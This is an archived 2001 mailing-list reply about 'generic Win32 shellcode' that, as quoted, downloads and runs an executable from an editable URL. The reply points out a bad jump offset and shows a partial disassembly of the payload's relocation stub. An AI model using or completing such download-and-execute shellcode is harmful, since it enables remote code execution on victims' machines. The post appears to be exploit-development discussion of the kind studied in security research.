AW: GENERIC Win32 Shellcode

From: Der HexXer (DerHexXerat_private)
Date: Sun Aug 19 2001 - 21:56:45 PDT

  • Next message: Dino: "Windows XP RC2"

    >I send a generic win32 shellcode in attachment. It has a size of 800 bytes
    >and have an editable URL line. It must point to an exe in internet.
    >Shellcode will download it and execute. It runs in Windows
    >95/98/ME/NT/2000 and XP. The file to download has a limit of 2.2 Mb. If
    >someone can test shellcode please send me an email for comment it.
    Why do you have an relative jump to [ShellCode-Entry] - 7 Bytes
    at the beginning of your code?
    (the first jump should be EIP+11 bytes: \xEB\x0B\x...)
    Debug: (added 4 nops; entry: 00401000)
      00401003 90                   nop
      00401004 EB F7                jmp         00400FFD ;???
      00401006 8D 76 17             lea         esi,[esi+17h]
      00401009 8B FC                mov         edi,esp
      0040100B 8B D7                mov         edx,edi
      0040100D F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
      0040100F 52                   push        edx
      00401010 C3                   ret
      00401011 EB 30                jmp         00401043 ;eip should jump to
    this address
     ;00401228 E8 E6 FD FF FF       call        00401013
    =>00401013 5F                   pop         edi
    Der HexXer.

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